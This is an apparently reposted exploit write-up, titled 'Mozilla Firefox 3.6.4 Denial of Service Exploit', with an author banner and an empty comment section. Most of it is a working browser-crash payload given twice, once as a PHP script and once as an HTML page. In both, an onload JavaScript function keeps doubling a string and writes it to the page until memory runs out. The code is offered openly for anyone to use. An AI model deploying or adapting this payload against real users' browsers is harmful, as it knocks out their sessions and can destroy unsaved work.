Mozilla Firefox 3.6.4拒绝服务利用

##############################################################################
# [+]Title: [Mozilla Firefox 3.6.4 Denial of Service Exploit]
##############################################################################
# [+] About :
##############################################################################
# Author :  GlaDiaT0R 
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team :  Tunisian Power Team  ( DarkGh0st.Net )
# Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends
##############################################################################
 
[+] : It’s let Mozilla Firefox 3.6.4 crashing simply with opening the exploit.php or exploit.html

[+] : Exploit

  =====================
         PHP
  =====================
exploit.php

  <?php
echo "<html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title>\n";
echo "<script>\n";
echo "function junk()\n";
echo "{\n";
echo "var buff=\"A\";\n";
echo "for (i=0;i<787;i++)\n";
echo "{\n";
echo "buff+=buff+\"A\";\n";
echo "document.write(buff+buff);\n";
echo "}\n";
echo "}\n";
echo "</script>\n";
echo "<body onload=\"javascript:junk();\">\n";
echo "<font color=white>the_gl4di4t0r<font color=\"grey\">[AT]</font>hotmail<font color=\"grey\">[DOT]</font>com</font>\n";
echo "</body>\n";
echo "</html>  \n";
echo "\n";
?>

  =====================
         HTML
  =====================
exploit.html

<html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title>
<script>
function junk()
{
var buff="A";
for (i=0;i<787;i++)
{
buff+=buff+"A";
document.write(buff+buff);
}
}
</script>
<body onload="javascript:junk();">
<font color=white>the_gl4di4t0r<font color="grey">[AT]</font>hotmail<font color="grey">[DOT]</font>com</font>
</body>
</html> 

##############################################################
Notice: I’M MUSLIM
##############################################################

发表评论?

0 条评论。

发表评论